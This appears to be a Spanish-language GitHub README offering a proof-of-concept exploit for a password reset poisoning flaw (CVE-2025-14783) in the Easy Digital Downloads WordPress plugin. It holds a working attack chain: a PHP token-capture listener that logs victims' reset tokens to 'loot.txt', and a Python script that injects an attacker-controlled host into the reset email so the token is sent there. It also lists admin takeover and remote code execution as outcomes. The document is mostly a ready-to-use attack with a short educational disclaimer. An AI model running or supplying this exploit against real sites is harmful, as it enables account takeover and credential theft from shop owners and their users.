<p align="center">
  <img src="https://github.com/ZeroEthical/CVE-2025-14783-POC/blob/main/photo.jpg"  width="600"/>
</p>



---
# 🧨 CVE-2025-14783: Easy Digital Downloads Account Takeover PoC
---

[![Author](https://img.shields.io/badge/Author-ZeroEthical-red.svg?style=for-the-badge)](https://github.com/ZeroEthical)
[![Severity](https://img.shields.io/badge/Severity-CRITICAL-critical.svg?style=for-the-badge)](https://nvd.nist.gov/vuln/detail/CVE-2025-14783)
[![Vulnerability](https://img.shields.io/badge/Type-Password_Reset_Poisoning-orange.svg?style=for-the-badge)](https://cwe.mitre.org/data/definitions/640.html)
[![Language](https://img.shields.io/badge/Python-3.x-blue.svg?style=for-the-badge)](https://python.org)

> "La confianza es el fallo de seguridad más explotable."

---

## 💀 Descripción

Este repositorio contiene una Prueba de Concepto (PoC) funcional para **CVE-2025-14783**, una vulnerabilidad crítica de **Password Reset Poisoning** (Envenenamiento de Restablecimiento de Contraseña) en el plugin **Easy Digital Downloads (EDD)** para WordPress (versiones `<= 3.6.2`).

Debido a una falta de validación en el parámetro `edd_redirect` durante el proceso de solicitud de restablecimiento de contraseña, un atacante remoto no autenticado puede inyectar un dominio malicioso. Esto provoca que el correo electrónico legítimo enviado por la tienda contenga un enlace de restablecimiento que apunta al servidor del atacante, filtrando el token de acceso (`key`) y permitiendo el **Account Takeover (ATO)** total, incluso de cuentas de administrador.

---

## 🔍 Análisis Técnico

El fallo reside en la función que construye la URL de restablecimiento dentro del correo electrónico. El código vulnerable utiliza `esc_url_raw()` para "sanitizar" la entrada, pero **no valida el host de destino**.

### Fragmento Vulnerable

```php
// El desarrollador confió en que esc_url_raw era suficiente seguridad... error fatal.
$message = str_replace(
    '{password_reset_link}',
    add_query_arg(
        array(
            'edd_action' => 'password_reset_requested',
            'key'        => $key,
            'login'      => rawurlencode( $user_login ),
        ),
        esc_url_raw( $_POST['edd_redirect'] ) // <--- PUNTO DE INYECCIÓN
    ),
    $message
);
```

Al controlar `$_POST['edd_redirect']`, controlamos la base de la URL generada.

---

## 🛠️ Instalación y Uso

### Requisitos

*   Python 3.x
*   `requests` lib (`pip install requests`)
*   Un servidor web bajo tu control (para capturar los tokens).

### 1. Configurar el Listener (Servidor del Atacante)

Sube el siguiente script PHP (`logger.php`) a tu servidor malicioso para interceptar los tokens de las víctimas.

```php
<?php
// logger.php - Captura el token y el usuario
$key = $_GET['key'] ?? '';
$login = $_GET['login'] ?? '';
$ip = $_SERVER['REMOTE_ADDR'];
$date = date('Y-m-d H:i:s');

if ($key && $login) {
    $log = "[$date] TARGET: $login | TOKEN: $key | IP: $ip" . PHP_EOL;
    file_put_contents('loot.txt', $log, FILE_APPEND);
    echo "System maintenance. Please try again later."; // Ingeniería social básica
}
?>
```

### 2. Ejecutar el Exploit

Edita el script `exploit.py` con tus objetivos y ejecútalo.

```bash
python3 exploit.py
```

#### Código del Exploit (`exploit.py`)

```python
import requests
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# CONFIGURACIÓN
TARGET_URL = "http://vulnerable-shop.com/" # URL raíz de la tienda
VICTIM_EMAIL = "admin@vulnerable-shop.com"
ATTACKER_HOST = "http://tu-servidor-malicioso.com/logger.php" 

def poison_reset_link():
    print(f"[*] Objetivo: {TARGET_URL}")
    print(f"[*] Víctima: {VICTIM_EMAIL}")
    print(f"[*] Envenenando enlace con: {ATTACKER_HOST}")

    # Payload para inyectar la redirección
    data = {
        'edd_action': 'user_send_password_reset',
        'user_email': VICTIM_EMAIL,
        'edd_redirect': ATTACKER_HOST 
    }

    try:
        # Enviamos la petición al endpoint principal (o donde EDD escuche el POST)
        r = requests.post(TARGET_URL, data=data, verify=False, timeout=10)
        
        if r.status_code == 200:
            print("[+] ¡Éxito! Correo envenenado enviado.")
            print("[*] Ahora espera a que la víctima haga clic en el enlace del correo.")
            print("[*] Revisa 'loot.txt' en tu servidor para obtener el token.")
        else:
            print(f"[-] Fallo. Código de estado: {r.status_code}")
            
    except Exception as e:
        print(f"[!] Error: {e}")

if __name__ == "__main__":
    poison_reset_link()
```

---

## 📊 Impacto

| Confidencialidad | Integridad | Disponibilidad |
| :---: | :---: | :---: |
| **ALTA** 🟥 | **ALTA** 🟥 | BAJA 🟩 |

Un atacante exitoso puede:
1.  Interceptar el token de restablecimiento de contraseña.
2.  Cambiar la contraseña de la víctima (incluso Administradores).
3.  Acceder al panel de administración de WordPress.
4.  Subir plugins maliciosos (RCE) y comprometer todo el servidor.

---

## ⚠️ Disclaimer

```text
Este software se proporciona ÚNICAMENTE con fines educativos y de investigación de seguridad.
El autor (ZeroEthical) no se hace responsable del uso indebido de esta información.
Atacar objetivos sin consentimiento previo por escrito es ilegal y puede resultar en acciones legales severas.
Úsalo bajo tu propio riesgo en entornos controlados.
```

---

<p align="center">
  <b>Powered by <a href="https://github.com/ZeroEthical">ZeroEthical</a></b><br>
  <i>"We don't fix vulnerabilities, we demonstrate them."</i>
</p>
